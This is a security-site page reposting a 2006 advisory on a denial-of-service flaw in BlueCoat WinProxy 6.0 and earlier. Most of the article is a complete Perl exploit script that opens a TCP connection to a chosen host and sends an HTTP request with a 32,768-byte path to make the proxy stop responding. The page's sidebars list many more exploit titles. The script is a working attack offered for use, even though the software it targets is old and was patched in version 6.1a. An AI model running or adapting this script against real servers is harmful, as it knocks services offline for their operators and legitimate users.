首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BlueCoat WinProxy HTTP DoS
来源:FistFuXXer@gmx.de 作者:FistFucker 发布时间:2006-01-09  

BlueCoat WinProxy HTTP DoS (Exploit)

Summary
BlueCoat WinProxy is "an Internet sharing proxy server". Improper handling of long requests within BlueCoat WinProxy allow attackers to cause the program to no longer respond to legitimate requests.

Credit:
The information has been provided by FistFucker.

Details
Vulnerable Systems:
* WinProxy version 6.0 and prior

Immune Systems:
* WinProxy version 6.1a

Exploit:
#!perl
#
# "WinProxy 6.0 R1c" Remote DoS Exploit
#
# Author: FistFucker
# e-Mail: FistFuXXer at gmx.de
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363
#
# CVE info:
# CAN-2005-3187
#

use IO::Socket;

#
# destination IP address
#
$ip = '127.0.0.1';

#
# destination TCP port
#
$port = 80;


print '"WinProxy 6.0 R1c" Remote DoS Exploit'."\n\n";

$sock = IO::Socket::INET->new
(

PeerAddr => $ip,
PeerPort => $port,
Proto => 'tcp',
Timeout => 2

) or print '[-] Error: Could not establish a connection to the server!' and exit(1);

print "[+] Connected.\n";

$sock->send('GET /'. 'A' x 32768 ." HTTP/1.1\r\n\r\n");

print "[+] DoS string has been sent.";

close($sock);

#EoF



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP mysql_connect Function Nam
·BlueCoat WinProxy Host: Header
·Microsoft Windows Kernel APC D
·WinRAR 3.3.0 and below local B
·Fuju News 1.0 Authentication B
·PHPNuke EV 7.7 search module q
·Sybase EAServer 5.2 (WebConsol
·Venom Board version 1.22 SQL I
·Symantec Sygate Management Ser
·Magic News Plus <=1.0.3 Adm
·Novell Messenger Server 2.0 (A
·Cisco IP Phone 7940 remote den
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved